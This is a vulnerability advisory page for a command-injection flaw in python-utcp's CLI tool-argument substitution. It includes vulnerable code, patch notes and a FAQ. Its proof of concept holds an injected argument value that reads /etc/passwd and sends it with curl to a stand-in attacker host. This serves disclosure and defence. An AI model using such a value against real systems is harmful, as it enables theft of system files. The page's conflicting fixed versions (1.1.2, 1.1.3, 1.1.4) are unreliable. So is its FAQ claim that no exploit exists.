CVE-2026-45369: python-utcp: Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol
Summary
The substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c (Unix) or powershell.exe -Command (Windows), allowing an attacker to inject arbitrary shell commands.
Affected File
plugins/communicationprotocols/cli/src/utcpcli/clicommunicationprotocol.py
Vulnerable Code
python def replaceplaceholder(match): argname = match.group(1) if argname in toolargs: return str(toolargs[argname]) # No escaping applied
The substituted command is then embedded directly into a shell script:
python scriptlines.append(f'{varname}=$({substitutedcommand} 2>&1)')
And executed via:
python shellcmd = ['/bin/bash', '-c', script]
Proof of Concept
Given a tool defined as: json {"command": "python script.py --input UTCPARGfilenameUTCPEND"}
Calling with: python toolargs = {"filename": "data.csv; curl http://attacker.com/$(cat /etc/passwd | base64)"}
Produces and executes: bash CMD0OUTPUT=$(python script.py --input data.csv; curl http://attacker.com/$(cat /etc/passwd | base64) 2>&1)
This results in full Remote Code Execution on the host system.
Patched
Fixed in utcp-cli 1.1.2. substituteutcpargs now shell-quotes every substituted value: shlex.quote on Unix, a PowerShell single-quoted literal on Windows. Each UTCPARG...UTCPEND placeholder therefore expands to exactly one shell token, blocking metacharacter injection (;, |, &, backticks, $(), newlines).
Behavior change: tools that relied on a single placeholder splitting into multiple shell tokens (e.g. UTCPARGflagsUTCPEND -> --verbose --debug) must now use one placeholder per intended argument.
Mitigation
Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of refusing all attacker-controlled toolargs.
Credit
Reported by @ZeroXJacks.
Other sources
python-utcp is the python implementation of UTCP. Prior to 1.1.3, the substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c (Unix) or powershell.exe -Command (Windows), allowing an attacker to inject arbitrary shell commands. This vulnerability is fixed in 1.1.3.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-45369?
CVE-2026-45369 is classified as a high severity vulnerability due to the potential for command injection.
How do I fix CVE-2026-45369?
To fix CVE-2026-45369, upgrade to version 1.1.4 or later of python-utcp, or ensure that you are using utcp-cli version 1.1.2 or later.
What is the impact of CVE-2026-45369?
The impact of CVE-2026-45369 includes the risk of unauthorized command execution on affected systems.
Which versions of python-utcp are affected by CVE-2026-45369?
Versions of python-utcp prior to 1.1.4 are affected by CVE-2026-45369.
Is there a known exploit for CVE-2026-45369?
Currently, there is no publicly disclosed exploit specifically for CVE-2026-45369.